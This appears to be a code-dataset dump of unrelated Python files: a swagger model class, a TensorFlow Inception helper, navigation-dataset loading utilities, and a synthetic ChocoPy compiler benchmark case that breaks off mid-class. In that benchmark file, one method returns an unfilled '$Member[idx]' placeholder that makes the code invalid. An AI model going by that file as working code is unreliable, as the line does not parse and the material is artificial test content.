:return: The _self of this NSServiceGroupListResult. # noqa: E501
:rtype: SelfResourceLink
"""
return self.__self
@_self.setter
def _self(self, _self):
"""Sets the _self of this NSServiceGroupListResult.
:param _self: The _self of this NSServiceGroupListResult. # noqa: E501
:type: SelfResourceLink
"""
self.__self = _self
@property
def links(self):
"""Gets the links of this NSServiceGroupListResult. # noqa: E501
The server will populate this field when returing the resource. Ignored on PUT and POST. # noqa: E501
:return: The links of this NSServiceGroupListResult. # noqa: E501
:rtype: list[ResourceLink]
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this NSServiceGroupListResult.
The server will populate this field when returing the resource. Ignored on PUT and POST. # noqa: E501
:param links: The links of this NSServiceGroupListResult. # noqa: E501
:type: list[ResourceLink]
"""
self._links = links
@property
def schema(self):
"""Gets the schema of this NSServiceGroupListResult. # noqa: E501
:return: The schema of this NSServiceGroupListResult. # noqa: E501
:rtype: str
"""
return self._schema
@schema.setter
def schema(self, schema):
"""Sets the schema of this NSServiceGroupListResult.
:param schema: The schema of this NSServiceGroupListResult. # noqa: E501
:type: str
"""
self._schema = schema
@property
def cursor(self):
"""Gets the cursor of this NSServiceGroupListResult. # noqa: E501
Opaque cursor to be used for getting next page of records (supplied by current result page) # noqa: E501
:return: The cursor of this NSServiceGroupListResult. # noqa: E501
:rtype: str
"""
return self._cursor
@cursor.setter
def cursor(self, cursor):
"""Sets the cursor of this NSServiceGroupListResult.
Opaque cursor to be used for getting next page of records (supplied by current result page) # noqa: E501
:param cursor: The cursor of this NSServiceGroupListResult. # noqa: E501
:type: str
"""
self._cursor = cursor
@property
def sort_ascending(self):
"""Gets the sort_ascending of this NSServiceGroupListResult. # noqa: E501
:return: The sort_ascending of this NSServiceGroupListResult. # noqa: E501
:rtype: bool
"""
return self._sort_ascending
@sort_ascending.setter
def sort_ascending(self, sort_ascending):
"""Sets the sort_ascending of this NSServiceGroupListResult.
:param sort_ascending: The sort_ascending of this NSServiceGroupListResult. # noqa: E501
:type: bool
"""
self._sort_ascending = sort_ascending
@property
def sort_by(self):
"""Gets the sort_by of this NSServiceGroupListResult. # noqa: E501
Field by which records are sorted # noqa: E501
:return: The sort_by of this NSServiceGroupListResult. # noqa: E501
:rtype: str
"""
return self._sort_by
@sort_by.setter
def sort_by(self, sort_by):
"""Sets the sort_by of this NSServiceGroupListResult.
Field by which records are sorted # noqa: E501
:param sort_by: The sort_by of this NSServiceGroupListResult. # noqa: E501
:type: str
"""
self._sort_by = sort_by
@property
def result_count(self):
"""Gets the result_count of this NSServiceGroupListResult. # noqa: E501
Count of results found (across all pages), set only on first page # noqa: E501
:return: The result_count of this NSServiceGroupListResult. # noqa: E501
:rtype: int
"""
return self._result_count
@result_count.setter
def result_count(self, result_count):
"""Sets the result_count of this NSServiceGroupListResult.
Count of results found (across all pages), set only on first page # noqa: E501
:param result_count: The result_count of this NSServiceGroupListResult. # noqa: E501
:type: int
"""
self._result_count = result_count
@property
def results(self):
"""Gets the results of this NSServiceGroupListResult. # noqa: E501
Paged collection of NSServiceGroups # noqa: E501
:return: The results of this NSServiceGroupListResult. # noqa: E501
:rtype: list[NSServiceGroup]
"""
return self._results
@results.setter
def results(self, results):
"""Sets the results of this NSServiceGroupListResult.
Paged collection of NSServiceGroups # noqa: E501
:param results: The results of this NSServiceGroupListResult. # noqa: E501
:type: list[NSServiceGroup]
"""
if results is None:
raise ValueError("Invalid value for `results`, must not be `None`") # noqa: E501
self._results = results
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NSServiceGroupListResult):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"tcraft@pivotal.io"
] |
tcraft@pivotal.io
|
a7ac6aca6ae6303875db1502f4c7a1f188290a7d
|
bead792530ab007addd60ce777e9ce19bc45cc74
|
/inception-google/utils.py
|
b797d03ecbf9e46c79fdd3249d8fbd5b928d25c1
|
[] |
no_license
|
knowmefly/Youth-AI-SelfImprovement
|
aefb47bf13284509372cfd6c1ea14a81e2be21ce
|
bb15cdc07dc6c231b5d44acae088f98a44f97761
|
refs/heads/master
| 2020-04-25T04:26:20.997249
| 2019-03-06T20:33:08
| 2019-03-06T20:33:08
| 172,510,073
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,371
|
py
|
# -*- coding: utf-8 -*-
import tensorflow as tf
slim = tf.contrib.slim
# 定义默认的arg scope
def inception_arg_scope(weight_decay=0.00004,
use_batch_norm=True,
batch_norm_decay=0.9997,
batch_norm_epsilon=0.001,
activation_fn=tf.nn.relu,
batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
# 指定正则化函数的参数
batch_norm_params = {
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'updates_collections': batch_norm_updates_collections,
'fused': None,
}
if use_batch_norm:
normalizer_fn = slim.batch_norm
normalizer_params = batch_norm_params
else:
normalizer_fn = None
normalizer_params = {}
# 为卷积层和全连接层的权重设置 weight_decay
with slim.arg_scope([slim.conv2d, slim.fully_connected],
weights_regularizer=slim.l2_regularizer(weight_decay)):
with slim.arg_scope(
[slim.conv2d],
weights_initializer=slim.variance_scaling_initializer(),
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params) as sc:
return sc
|
[
"knowmefly@qq.com"
] |
knowmefly@qq.com
|
31377b78b9aa2c2a50c21500d418eb84e8d65b07
|
ae5bc58aea259f9e633398b99e9705c89a0cea3d
|
/tasks/viewpoint_select/utils_data.py
|
15883db86b9b6068ef4ef746b53f5f631cafb115
|
[
"MIT-0"
] |
permissive
|
ayshrv/visitron
|
3bacefd4cf62c66864cfcdba4e24af7a576590dd
|
2f30e6c002ed021d2be209a94a5e77c2d7e2117f
|
refs/heads/main
| 2023-06-03T17:47:06.905510
| 2021-06-30T22:18:55
| 2021-06-30T22:18:55
| 302,179,557
| 1
| 0
|
NOASSERTION
| 2021-06-30T22:59:18
| 2020-10-07T22:56:49
|
Python
|
UTF-8
|
Python
| false
| false
| 20,796
|
py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import base64
import csv
import json
import logging
import math
import os
import pickle
import re
import sys
import time
from itertools import chain
import lmdb
import networkx as nx
import numpy as np
from tqdm import tqdm
csv.field_size_limit(sys.maxsize)
logger = logging.getLogger(__name__)
def load_nav_graphs(scans):
""" Load connectivity graph for each scan """
def distance(pose1, pose2):
""" Euclidean distance between two graph poses """
return (
(pose1["pose"][3] - pose2["pose"][3]) ** 2
+ (pose1["pose"][7] - pose2["pose"][7]) ** 2
+ (pose1["pose"][11] - pose2["pose"][11]) ** 2
) ** 0.5
graphs = {}
for scan in scans:
with open("connectivity/%s_connectivity.json" % scan) as f:
G = nx.Graph()
positions = {}
data = json.load(f)
for i, item in enumerate(data):
if item["included"]:
for j, conn in enumerate(item["unobstructed"]):
if conn and data[j]["included"]:
positions[item["image_id"]] = np.array(
[item["pose"][3], item["pose"][7], item["pose"][11]]
)
assert data[j]["unobstructed"][
i
], "Graph should be undirected"
G.add_edge(
item["image_id"],
data[j]["image_id"],
weight=distance(item, data[j]),
)
nx.set_node_attributes(G, values=positions, name="position")
graphs[scan] = G
return graphs
def get_data_root(dataset_type="NDH"):
if dataset_type == "NDH":
data_root = "srv/task_data/NDH/data/"
elif dataset_type == "CVDN":
data_root = "srv/task_data/CVDN/data/"
elif dataset_type == "R2R":
data_root = "srv/task_data/R2R/data/R2R_"
elif dataset_type == "R4R":
data_root = "srv/task_data/R4R/data/R4R_"
elif dataset_type == "RxR":
data_root = "srv/task_data/RxR/data"
elif dataset_type == "PretrainNDH":
data_root = "srv/task_data/pretrain_data/NDH_"
elif dataset_type == "PretrainR2R":
data_root = "srv/task_data/pretrain_data/R2R_"
elif dataset_type == "PretrainR4R":
data_root = "srv/task_data/pretrain_data/R4R_"
elif dataset_type == "PretrainRxR":
data_root = "srv/task_data/pretrain_data/RxR_"
else:
raise NotImplementedError
return data_root
def load_datasets(splits, dataset_type="NDH"):
data = []
data_root = get_data_root(dataset_type)
if dataset_type == "RxR":
import jsonlines
assert splits == ["train"]
with jsonlines.open(f"{data_root}/rxr_train_guide.jsonl") as f:
for line in f.iter():
data.append(line)
return data
for split in splits:
assert split in ["train", "val_seen", "val_unseen", "test"]
with open(data_root + "%s.json" % split) as f:
data += json.load(f)
return data
def load_classifier_data(splits):
data = []
raw_data = []
data_root = get_data_root("CVDN")
for split in splits:
assert split in ["train", "val_seen", "val_unseen", "test"]
data_path = data_root + "%s.json" % split
with open(data_path) as f:
items = json.load(f)
raw_data.extend(items)
for item in raw_data:
item["inst_idx"] = str(item["idx"])
item["planner_path"] = item["planner_nav_steps"]
item["player_path"] = item["nav_steps"]
item["nav_history"] = item["player_path"]
heading, elevation = 2.0, 17.5
if "nav_camera" in item and len(item["nav_camera"]) > 0:
nav_camera = item["nav_camera"][0]
if "message" in nav_camera:
heading = nav_camera["message"][-1]["heading"]
elevation = nav_camera["message"][-1]["elevation"]
item["start_pano"] = {
"heading": heading,
"elevation": elevation,
"pano": item["planner_nav_steps"][0],
}
dialog = {0: []}
last_timestep = 0
for index, turn in enumerate(item["dialog_history"]):
if index % 2 == 0:
assert turn["role"] == "navigator"
timestep = turn["nav_idx"]
message = turn["message"]
dialog_history = dialog[last_timestep]
dialog_history.append(message)
dialog[timestep] = dialog_history
last_timestep = timestep
else:
if timestep != turn["nav_idx"]:
logger.info(
"Timestep for oracle and navigator mismatch, correcting it. "
f"Timestep: {timestep} turn['nav_idx']: {turn['nav_idx']}"
)
assert turn["role"] == "oracle"
message = turn["message"]
dialog_history = dialog[timestep]
dialog_history.append(message)
dialog[timestep] = dialog_history
item["dialog_history"] = dialog
item["request_locations"] = list(dialog.keys())
data.append(item)
return data
def load_gameplay_data(splits):
data = []
data_root = get_data_root("CVDN")
for split in splits:
assert split in ["train", "val_seen", "val_unseen", "test"]
logger.info("Using CVDN for " + split + "!\n\n\n")
data_source = data_root + split + ".json"
with open(data_source) as f:
items = json.load(f)
new_items = []
for item in items:
item["inst_idx"] = item["idx"]
item["planner_path"] = item["planner_nav_steps"]
item["player_path"] = item["nav_steps"]
item["nav_history"] = item["player_path"]
heading, elevation = 2.0, 17.5
if "nav_camera" in item and len(item["nav_camera"]) > 0:
nav_camera = item["nav_camera"][0]
if "message" in nav_camera:
heading = nav_camera["message"][-1]["heading"]
elevation = nav_camera["message"][-1]["elevation"]
item["start_pano"] = {
"heading": heading,
"elevation": elevation,
"pano": item["planner_nav_steps"][0],
}
nav_ins, ora_ins, request_locations, nav_seen, ora_seen, nav_idx = (
[],
[],
{},
[],
[],
0,
)
for index, turn in enumerate(item["dialog_history"]):
if turn["role"] == "navigator":
nav_ins.append(turn["message"])
if len(ora_seen) > 0:
request_locations[nav_idx] = [
" ".join(nav_seen),
" ".join(ora_seen),
index,
]
ora_seen = []
nav_seen = []
nav_seen.append(turn["message"])
else:
ora_ins.append(turn["message"])
if len(nav_seen) > 0:
nav_idx = int(turn["nav_idx"])
ora_seen.append(turn["message"])
if len(ora_seen) > 0:
request_locations[nav_idx] = [
nav_seen[-1],
ora_seen[-1],
len(item["dialog_history"]),
] # [' '.join(nav_seen), ' '.join(ora_seen), len(item['dialog_history'])]
item["nav_instructions"] = " ".join(nav_ins)
item["ora_instructions"] = " ".join(ora_ins)
if (
len(item["nav_instructions"]) == 0
or len(item["ora_instructions"]) == 0
):
continue
item["request_locations"] = request_locations
item["inst_idx"] = str(item["inst_idx"])
assert len(item["player_path"]) > 1, item["player_path"]
new_items.append(item)
data += new_items
return data
def save_preprocessed_data(data, splits, version, dataset_type="NDH"):
data_root = get_data_root(dataset_type)
combined_split = "_".join(splits)
path = f"{data_root}{combined_split}_preprocessed_{version}.pickle"
logger.info(f"Saving preprocessed data to {path}")
with open(path, "wb") as handle:
pickle.dump(data, handle, protocol=-1)
def check_and_load_preprocessed_data(splits, version, dataset_type="NDH"):
if dataset_type == "NDH":
data_root = "srv/task_data/NDH/data/"
elif dataset_type == "R2R":
data_root = "srv/task_data/R2R/data/R2R_"
elif dataset_type == "R4R":
data_root = "srv/task_data/R4R/data/R4R_"
elif dataset_type == "RxR":
data_root = "srv/task_data/RxR/data/RxR_"
elif dataset_type == "PretrainNDH":
data_root = "srv/task_data/pretrain_data/NDH_"
elif dataset_type == "PretrainR2R":
data_root = "srv/task_data/pretrain_data/R2R_"
elif dataset_type == "PretrainR4R":
data_root = "srv/task_data/pretrain_data/R4R_"
elif dataset_type == "PretrainRxR":
data_root = "srv/task_data/pretrain_data/RxR_"
else:
raise NotImplementedError
combined_split = "_".join(splits)
path = f"{data_root}{combined_split}_preprocessed_{version}.pickle"
if os.path.exists(path) and os.path.isfile(path):
logger.info(f"Loading preprocessed data from {path}")
t_s = time.time()
with open(path, "rb") as handle:
data = pickle.load(handle)
t_e = time.time()
logger.info(
"Loaded Image Features from {} in time: {:0.2f} mins".format(
path, (t_e - t_s) / 60.0
)
)
return data
return False
def truncate_dialogs(sentences, amount, left=True):
"""
Truncate `dialogs` at a token-level TO the specified `amount` FROM the direction specified by `left`
Consider length of each dialog to be len(dialog) + 1 as `[QUES]` or `[ANS]` tag needs to be counted as well.
"""
if amount is None:
return sentences
if (len(list(chain(*sentences))) + len(sentences)) <= amount:
return sentences
if left:
reversed_sentences = sentences[::-1]
reversed_truncated_sentences = []
amount_appended = 0
for turn in reversed_sentences:
if amount_appended < amount:
remaining_amount = amount - amount_appended
if (len(turn) + 1) <= remaining_amount:
reversed_truncated_sentences.append(turn)
amount_appended += len(turn) + 1
else:
reversed_truncated_sentences.append(turn[-remaining_amount + 1 :])
amount_appended += len(turn[-remaining_amount + 1 :]) + 1
break # can break out of the loop at this point
truncated_sentences = reversed_truncated_sentences[::-1]
return truncated_sentences
else:
truncated_sentences = []
amount_appended = 0
for turn in sentences:
if amount_appended < amount:
remaining_amount = amount - amount_appended
if (len(turn) + 1) <= remaining_amount:
truncated_sentences.append(turn)
amount_appended += len(turn) + 1
else:
truncated_sentences.append(turn[: remaining_amount - 1])
amount_appended += len(turn[: remaining_amount - 1]) + 1
break # can break out of the loop at this point
return truncated_sentences
def read_tsv_img_features(path=None, feature_size=2048, blind=False):
if path:
logger.info("Loading image features from %s" % path)
if blind:
logger.info("... and zeroing them out for 'blind' evaluation")
tsv_fieldnames = [
"scanId",
"viewpointId",
"image_w",
"image_h",
"vfov",
"features",
]
features = {}
with open(path, "rt") as tsv_in_file:
reader = csv.DictReader(
tsv_in_file, delimiter="\t", fieldnames=tsv_fieldnames
)
for item in reader:
image_h = int(item["image_h"])
image_w = int(item["image_w"])
vfov = int(item["vfov"])
long_id = item["scanId"] + "_" + item["viewpointId"]
if not blind:
features[long_id] = np.frombuffer(
base64.b64decode(item["features"]), dtype=np.float32
).reshape((36, feature_size))
else:
features[long_id] = np.zeros((36, feature_size), dtype=np.float32)
else:
logger.info("Image features not provided")
features = None
image_w = 640
image_h = 480
vfov = 60
dictionary = {
"features": features,
"image_w": image_w,
"image_h": image_h,
"vfov": vfov,
}
return dictionary
def timeSince(since, percent):
now = time.time()
s = now - since
es = s / percent
rs = es - s
return "%s (- %s)" % (asMinutes(s), asMinutes(rs))
def asMinutes(s):
m = math.floor(s / 60)
s -= m * 60
return "%dm %ds" % (m, s)
def load_detector_classes(UPDOWN_DATA="srv/detector_classes_attributes"):
classes = ["__background__"]
with open(os.path.join(UPDOWN_DATA, "objects_vocab.txt")) as f:
for object in f.readlines():
classes.append(object.split(",")[0].lower().strip())
return classes
class FeaturesReader:
def __init__(self, path, use_lmdb=True, in_memory=False):
self.use_lmdb = use_lmdb
if not self.use_lmdb:
(
self.keys,
self.features,
self.region_tokens,
self.image_w,
self.image_h,
self.vfov,
) = self.load_features_from_pickle(path)
else:
img_feature_path = path + ".lmdb"
logger.info(f"Loading lmdb features from {img_feature_path}")
# open database
self.env = lmdb.open(
img_feature_path,
readonly=True,
readahead=False,
max_readers=1,
lock=False,
)
# get keys
with self.env.begin(write=False) as txn:
self.keys = pickle.loads(txn.get("keys".encode()))
key = self.keys[0]
with self.env.begin(write=False) as txn:
item = pickle.loads(txn.get(key))
self.image_w = item["image_w"]
self.image_h = item["image_h"]
self.vfov = item["vfov"]
region_labels_path = path + "-region_labels.pickle"
with open(region_labels_path, "rb") as handle:
self.region_tokens = pickle.load(handle)
logger.info(f"Loaded region labels from {region_labels_path}")
# get viewpoints
self.viewpoints = {}
for key in self.keys:
scan_id, viewpoint_id, feature_view_index = key.decode().split("_")
if scan_id not in self.viewpoints:
self.viewpoints[scan_id] = set()
self.viewpoints[scan_id].add(viewpoint_id)
def load_features_from_pickle(self, path):
t_s = time.time()
img_feature_path = path + ".pickle"
logger.info(f"Loading Image Features from {img_feature_path}")
with open(img_feature_path, "rb") as f:
loaded_feature_data = pickle.load(f)
image_w = loaded_feature_data[0]["image_w"]
image_h = loaded_feature_data[0]["image_h"]
vfov = loaded_feature_data[0]["vfov"]
keys = []
features = {}
region_tokens = {}
for item in loaded_feature_data:
long_id = (
f"{item['scanId']}_{item['viewpointId']}_{item['featureViewIndex']}"
).encode()
features[long_id] = item["features"]
region_tokens[long_id] = item["region_tokens"]
keys.append(long_id)
t_e = time.time()
logger.info(
"Loaded Image Features from {} in time: {:0.2f} mins".format(
img_feature_path, (t_e - t_s) / 60.0
)
)
return keys, features, region_tokens, image_w, image_h, vfov
def __len__(self):
return len(self.keys)
def __getitem__(self, key):
if key not in self.keys:
raise TypeError(f"invalid key: {key}")
if self.use_lmdb:
# load from disk
with self.env.begin(write=False) as txn:
item = pickle.loads(txn.get(key))
return item["features"]
else:
return self.features[key]
def get_region_tokens(self, key):
if key not in self.keys:
raise TypeError(f"invalid key: {key}")
return self.region_tokens[key]
def get_encoding_for_oscar(tokenizer, obs):
truncate_dialog = True
use_oscar_settings = True
TAR_BACK = False
pad_token_id = 0
cls_token_segment_id = 0
pad_token_segment_id = 0
sep_token_segment_id = 0
tar_token_segment_id = 1
ques_token_segment_id = 2
ans_token_segment_id = 3
MAX_SEQ_LENGTH = 512
MAX_DIALOG_LEN = 512 - 4 # including [QUES]s and [ANS]s
MAX_TARGET_LENGTH = 4 - 2 # [CLS], [TAR], [SEP] after QA and before Action
# # TOTAL 768
new_obs = []
for item in obs:
instruction = item["instructions"]
target = instruction.split("<TAR>")[1]
rest = instruction.split("<TAR>")[0]
dialog_history = re.split("<NAV>|<ORA>", rest)
dialog_history = [item for item in dialog_history if item != ""]
token_target = tokenizer.tokenize(target)
token_target = token_target[:MAX_TARGET_LENGTH]
token_dialog_history = []
for turn in dialog_history:
token_turn = tokenizer.tokenize(turn)
token_dialog_history.append(token_turn)
if truncate_dialog:
# max_seq_length - 4 as accounting for [CLS], [TAR], Target, [SEP]
token_dialog_history = truncate_dialogs(
token_dialog_history, amount=MAX_DIALOG_LEN, left=True
)
tokens = [tokenizer.cls_token]
segment_ids = [cls_token_segment_id]
if not TAR_BACK:
if use_oscar_settings:
sep_token = tokenizer.sep_token
else:
sep_token = tokenizer.tar_token
tokens += [sep_token] + token_target
segment_ids += [tar_token_segment_id] * (len(token_target) + 1)
for i, turn in enumerate(token_dialog_history):
if use_oscar_settings:
sep_token = tokenizer.sep_token
segment_id = sep_token_segment_id
else:
if i % 2 == 0:
sep_token = tokenizer.ques_token
segment_id = ques_token_segment_id
else:
sep_token = tokenizer.ans_token
segment_id = ans_token_segment_id
tokens += [sep_token] + turn
segment_ids += [segment_id] * (len(turn) + 1)
if TAR_BACK:
if use_oscar_settings:
sep_token = tokenizer.sep_token
else:
sep_token = tokenizer.tar_token
tokens += [sep_token] + token_target
segment_ids += [tar_token_segment_id] * (len(token_target) + 1)
tokens += [tokenizer.sep_token]
segment_ids += [sep_token_segment_id]
tokens += [pad_token_id] * (MAX_SEQ_LENGTH - len(tokens) - 1)
segment_ids += [pad_token_segment_id] * (MAX_SEQ_LENGTH - len(segment_ids) - 1)
token_ids = tokenizer.convert_tokens_to_ids(tokens)
new_obs.append({"instr_encoding": token_ids, "segment_ids": segment_ids})
# "tokens": tokens
return new_obs
|
[
"shrivastava.ayush1996@gmail.com"
] |
shrivastava.ayush1996@gmail.com
|
516909e27870935ab937ccd022e1ac2e00a7cc98
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/sieve-big-2404.py
|
36bdabeba62a66987aa786e8dfdb76e27f414dcd
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,752
|
py
|
# A resizable list of integers
class Vector(object):
items: [int] = None
size: int = 0
def __init__(self:"Vector"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector", idx: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector") -> int:
return self.size
# A resizable list of integers
class Vector2(object):
items: [int] = None
items2: [int] = None
size: int = 0
size2: int = 0
def __init__(self:"Vector2"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector2") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector2") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector2", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector2", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector2", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector2", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector2", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector2", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector2", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector2", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector2") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector2") -> int:
return self.size
# A resizable list of integers
class Vector3(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
def __init__(self:"Vector3"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector3") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector3", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector3", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector3", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector3", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector3", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector3", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector3", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector3", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector3", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector3", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector3", idx: int, idx2: int) -> int:
return $Member[idx]
# Retrieves an item at a given index
def get3(self:"Vector3", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector3") -> int:
return self.size
# A resizable list of integers
class Vector4(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
def __init__(self:"Vector4"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector4") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector4", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector4", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector4", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector4", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector4", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector4", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector4", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector4", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
